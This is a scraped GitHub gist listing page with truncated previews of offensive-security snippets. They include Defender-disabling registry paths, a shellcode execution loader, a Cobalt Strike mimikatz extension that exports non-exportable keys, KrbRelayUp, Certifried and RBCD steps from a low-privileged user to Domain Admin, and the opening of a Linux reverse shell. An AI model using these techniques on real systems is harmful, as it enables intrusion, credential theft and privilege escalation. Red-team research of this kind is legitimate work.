Skip to content

Instantly share code, notes, and snippets.

View OlivierLaflamme's full-sized avatar
:shipit:
؁؁؁؁؁؁؁؁؁؁؁؁؁؁🏴 403 Forbidden؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁🚩؁؁؁؁؁؁؁؁؁

Boschko OlivierLaflamme

:shipit:
؁؁؁؁؁؁؁؁؁؁؁؁؁؁🏴 403 Forbidden؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁🚩؁؁؁؁؁؁؁؁؁
View GitHub Profile
"Top 1000 values of registry.path",Count
"HKLM\SYSTEM\ControlSet001\Services\WinDefend\Start","1,483"
"HKLM\SYSTEM\ControlSet001\Services\UsoSvc\Start","1,477"
"HKLM\SYSTEM\ControlSet001\Services\WaaSMedicSvc\Start","1,477"
"HKLM\SYSTEM\ControlSet001\Services\wuauserv\Start","1,477"
"HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService\Start",6
"HKLM\SYSTEM\ControlSet001\Services\Sense\Start",6
"HKLM\SYSTEM\ControlSet001\Services\WdBoot\Start",6
"HKLM\SYSTEM\ControlSet001\Services\WdFilter\Start",6
"HKLM\SYSTEM\ControlSet001\Services\WdNisDrv\Start",6
#include <iostream>
#include <Windows.h>
#include <winternl.h>
#include <psapi.h>
typedef NTSTATUS(NTAPI* pLdrLoadDll) (
PWCHAR PathToFile,
ULONG Flags,
PUNICODE_STRING ModuleFileName,
@RistBS
RistBS / shellcode_exec_workerfactory.c
Last active July 30, 2024 16:31
Just another shellcode execution technique :)
#include <Windows.h>
#include <stdio.h>
#define PRINTDEBUG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
typedef struct _UNICODE_STRING {
@tothi
tothi / mmimikatz.cna
Last active November 13, 2022 13:51
multi-command mimikatz functionality in a Cobalt Strike beacon
#
# multi-command mimikatz in a Cobalt Strike beacon extending the built-in mimikatz functionality
#
# cmd separator is |
#
# practical example: export machine certificates (including non-exportable private key :)):
#
# mmimikatz "crypto::capi|crypto::certificates /systemstore:local_machine /store:my /export"
#
@aniqfakhrul
aniqfakhrul / README.md
Last active March 21, 2024 08:56
Local Workstation to DC

From Local Workstation to DC

This exploit path will only imply if you have an interactive session on a domain joined workstation regardless the privilege of the account (it could be a low privileged account)

  1. Obtain system certificate for the current workstation
KrbRelayUp.exe relay -m shadowcred -f
  1. Get the certificate and certificate password.
@tothi
tothi / certifried_with_krbrelayup.md
Last active November 22, 2023 10:47
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

@Wra7h
Wra7h / Get-ProcessPipes.ps1
Last active May 3, 2024 00:41
Use PowerShell to get the PIDs associated with Named Pipes
function Get-ProcessPipes{
param(
[Parameter(Mandatory=$false)]
[string]$CSV,
[Parameter(Mandatory=$false)]
[switch]$All
)
Add-Type -TypeDefinition @"
using System;
@tothi
tothi / krbrelay_privesc_howto.md
Last active November 15, 2024 03:50
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
@jinschoi
jinschoi / create_sub.py
Last active November 11, 2024 19:05
Python script to generate Flipper RAW .sub files from OOK bitstreams
#!/usr/bin/env python3
from typing import Iterable, Union, Any
# freq: frequency in Hz
# zerolen: length of space bit in μs
# onelen: length of mark bit in μs
# repeats: number of times to repeat sequence
# pause: time to wait in μs between sequences
# bits: string of ones and zeros to represent sequence
@loneicewolf
loneicewolf / compact_linux_reverse_shell.c
Last active March 25, 2024 22:10
A compact linux reverse shell written in the C Programming Language.
/*
NOTE See Below for version 2 (and updates, erratas, fixes, links, and so on)
NOTE don't assume or think this is the latest because it's on first on top on the list; it's not.
Version 1 'naive approach' (hard coded values, etc)
gcc -g -o L1 lin_1.c
*/
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#define RP 1234